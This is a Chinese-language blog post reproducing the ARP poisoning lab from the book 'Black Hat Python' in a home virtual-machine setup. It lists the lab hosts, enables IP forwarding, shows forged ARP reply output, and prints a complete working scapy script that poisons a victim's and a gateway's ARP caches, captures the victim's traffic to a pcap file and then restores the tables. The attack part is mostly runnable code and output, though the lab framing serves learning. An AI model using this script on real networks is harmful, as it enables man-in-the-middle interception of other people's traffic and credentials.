近期收到了电子工业出版社赠送的一本网络安全书籍《python黑帽子》,书中一共24个实验,今天复现第9个实验(arp投毒),我的测试环境是mbp电脑+kali虚拟机+centos虚拟机+conda开发环境。涉及到受害者 centos、攻击者 kali、观察者 mbp、网关,攻击者作为网关和受害者之间的中间人,既要欺骗受害者,说自己是网关,又要欺骗网关,说自己是受害者~
ailx10
1、检查我们原始的网关、受害者信息、攻击者信息、观察者信息
- 受害者 centos :192.168.0.105 (8:0:27:f9:f4:e)
- 攻击者 kali :192.168.0.103 (8:0:27:e7:67:1c)
- 观察者 mbp :192.168.0.101 (18:65:90:cb:f0:5d)
- 网关:192.168.0.1 (94:d9:b3:66:ef:5c)
2、先在受害者 centos 上查看一下,结果和在观察者 mbp 上看到的一样
3、在攻击者kali 上开启IP转发
echo 1 > /proc/sys/net/ipv4/ip_forward
4、在攻击者kali 上运行脚本
欺骗受害者,说网关192.168.0.1的MAC地址在08:00:27:e7:67:1c(实际上这个MAC地址是攻击者kali)
ip src:192.168.0.1
ip dst:192.168.0.105
mac dst:08:00:27:f9:f4:0e
mac src:08:00:27:e7:67:1c
ARP is at 08:00:27:e7:67:1c says 192.168.0.1
欺骗网关,说受害者192.168.0.105的MAC地址在08:00:27:e7:67:1c(实际上这个MAC地址是攻击者kali)
ip src:192.168.0.105
ip dst:192.168.0.1
mac dst:94:d9:b3:66:ef:5c
mac src:08:00:27:e7:67:1c
ARP is at 08:00:27:e7:67:1c says 192.168.0.105
5、在受害者上查看ARP表
ARP表中的网关MAC地址,已经变成了攻击者kali 的MAC地址了。看到这,就算实验成功了~
参考代码:
# -*- coding: utf-8 -*-
# @Time : 2022/6/6 10:39 PM
# @Author : ailx10
# @File : arper.py
from multiprocessing import Process
from scapy.all import sniff,conf,get_if_addr,send,sndrcv,srp,wrpcap
from scapy.layers.inet import Ether
from scapy.layers.l2 import ARP
import os
import sys
import time
def get_mac(targetip):
    """Resolve *targetip* to a MAC address with a broadcast ARP request.

    Builds an ARP who-has for the address on the Ethernet broadcast
    destination and hands it to scapy's srp with timeout=2 and retry=10.

    Args:
        targetip: IPv4 address (string) to resolve.

    Returns:
        The Ethernet source address of the first answer as a string, or
        None when nothing answered within the timeout/retry budget.
    """
    who_has = Ether(dst="ff:ff:ff:ff:ff:ff") / ARP(op="who-has", pdst=targetip)
    answered, _unanswered = srp(who_has, timeout=2, retry=10, verbose=False)
    # answered yields (sent, received) pairs; only the first reply's
    # link-layer source matters, and next() yields None on an empty list.
    sources = (received[Ether].src for _sent, received in answered)
    return next(sources, None)
class Arper:
    """ARP cache poisoner for the book's chapter-9 exercise.

    Puts the host running this script between *victim* and *gateway* by
    telling each side that the other's IP is at this host's MAC, captures
    the victim's traffic to a pcap, then restores both ARP tables.

    Attributes set in __init__: victim, victimmac, gateway, gatewaymac,
    interface. run() additionally sets poison_thread and sniff_thread.
    """

    def __init__(self, victim, gateway, interface="en0"):
        """Resolve both MAC addresses and point scapy at *interface*.

        Args:
            victim: IPv4 address of the host whose traffic is captured.
            gateway: IPv4 address of the gateway the victim talks through.
            interface: interface name written to scapy's conf.iface.

        NOTE(review): get_mac() returns None when a host does not answer
        and nothing here checks for it, so a silent host ends up as
        hwdst=None in poison(); failing fast here would be safer.
        """
        self.victim = victim
        self.victimmac = get_mac(victim)
        self.gateway = gateway
        self.gatewaymac = get_mac(gateway)
        self.interface = interface
        # Global scapy settings: send/sniff on this interface, stay quiet,
        # and use libpcap for capture.
        conf.iface = interface
        conf.verb = 0
        conf.use_pcap = True
        print(f"Initialized {interface}:")
        print(f"Gateway ({gateway}) is at {self.gatewaymac}")
        print(f"Victim ({victim}) is at {self.victimmac}")
        print("-"*30)

    def run(self):
        """Start the poison loop and the capture as two child processes.

        poison() runs until sniff() terminates it. sniff() relies on its
        copy of self carrying poison_thread, which holds when the child is
        forked after that attribute was assigned.
        NOTE(review): each child is given a bound method of self; under the
        'spawn' start method (the macOS default) that pickles self together
        with an already-started Process, which looks fragile — confirm on
        the OS this is meant to run on.
        """
        self.poison_thread = Process(target=self.poison)
        self.poison_thread.start()
        self.sniff_thread = Process(target=self.sniff)
        self.sniff_thread.start()

    def poison(self):
        """Send forged ARP replies to victim and gateway once a second, forever.

        hwsrc is never set on either packet, so scapy fills it with the
        sending interface's own MAC (the captured output above shows the
        attacker's MAC as `mac src`); that is what redirects both caches.
        Exits via restore() and sys.exit() when KeyboardInterrupt is raised
        inside send(); a Ctrl-C that lands during time.sleep(1) in the
        else branch is not caught.
        """
        # Reply that misleads the victim: source IP is the gateway, source
        # MAC is the attacker's, destination IP and MAC are the victim's.
        poison_victim = ARP()
        poison_victim.op = 2  # 2 = is-at (ARP reply)
        poison_victim.psrc = self.gateway
        poison_victim.pdst = self.victim
        poison_victim.hwdst = self.victimmac
        print(f"ip src:{poison_victim.psrc}")
        print(f"ip dst:{poison_victim.pdst}")
        print(f"mac dst:{poison_victim.hwdst}")
        print(f"mac src:{poison_victim.hwsrc}")
        print(poison_victim.summary())
        print("-"*30)
        # Reply that misleads the gateway: source IP is the victim, source
        # MAC is the attacker's, destination IP and MAC are the gateway's.
        poison_gateway = ARP()
        poison_gateway.op = 2
        poison_gateway.psrc = self.victim
        poison_gateway.pdst = self.gateway
        poison_gateway.hwdst = self.gatewaymac
        print(f"ip src:{poison_gateway.psrc}")
        print(f"ip dst:{poison_gateway.pdst}")
        print(f"mac dst:{poison_gateway.hwdst}")
        print(f"mac src:{poison_gateway.hwsrc}")
        print(poison_gateway.summary())
        print("-"*30)
        print(f"Beginning the ARP poison.[CTRL-C to stop]")
        while True:
            # One dot per round so progress is visible without newlines.
            sys.stdout.write(".")
            sys.stdout.flush()
            try:
                send(poison_victim)
                send(poison_gateway)
            except KeyboardInterrupt:
                # Put the real MACs back before leaving the child process.
                self.restore()
                sys.exit()
            else:
                time.sleep(1)

    def sniff(self, count=50):
        """Capture *count* packets to/from the victim, then tear down.

        Runs in its own process (see run()). Sleeps 5 s first — presumably
        to let the poison loop take effect — captures with the BPF filter
        "ip host <victim>" on self.interface, writes arper.pcap in the
        current directory, restores both ARP tables and terminates the
        poison process.

        Args:
            count: number of packets to capture before stopping.

        NOTE(review): terminate() runs after restore(), so the poison loop
        can still emit one more forged reply after the repair packets went
        out; terminating first would make the cleanup reliable.
        """
        time.sleep(5)
        print(f"Sniffing {count} packets")
        bpf_filter = "ip host %s"%self.victim
        # This is scapy's module-level sniff(), not this method: class-scope
        # names are not visible from inside a method body.
        packets = sniff(count=count,filter=bpf_filter,iface=self.interface)
        wrpcap("arper.pcap",packets)
        print("Got the packets")
        self.restore()
        self.poison_thread.terminate()
        print("Finished.")

    def restore(self):
        """Repair both ARP caches with the genuine MAC addresses.

        Sends 15 is-at replies in each direction carrying the real
        gatewaymac / victimmac resolved in __init__, with the ARP target
        hardware address set to the broadcast address.
        """
        print("Restoring ARP tables...")
        send(ARP(op=2,psrc=self.gateway,hwsrc=self.gatewaymac,pdst=self.victim,hwdst="ff:ff:ff:ff:ff:ff"),count=15)
        send(ARP(op=2,psrc=self.victim,hwsrc=self.victimmac,pdst=self.gateway,hwdst="ff:ff:ff:ff:ff:ff"),count=15)
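if __name__ == "__main__":
    # Entry point: arper.py <victim_ip> <gateway_ip> <interface>.
    # Missing arguments used to surface as an IndexError from sys.argv;
    # print a usage line and exit non-zero instead.
    if len(sys.argv) < 4:
        sys.exit(f"usage: {sys.argv[0]} <victim_ip> <gateway_ip> <interface>")
    victim, gateway, interface = sys.argv[1:4]
    myarp = Arper(victim, gateway, interface)
    myarp.run()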
发布于 2022-06-07 06:51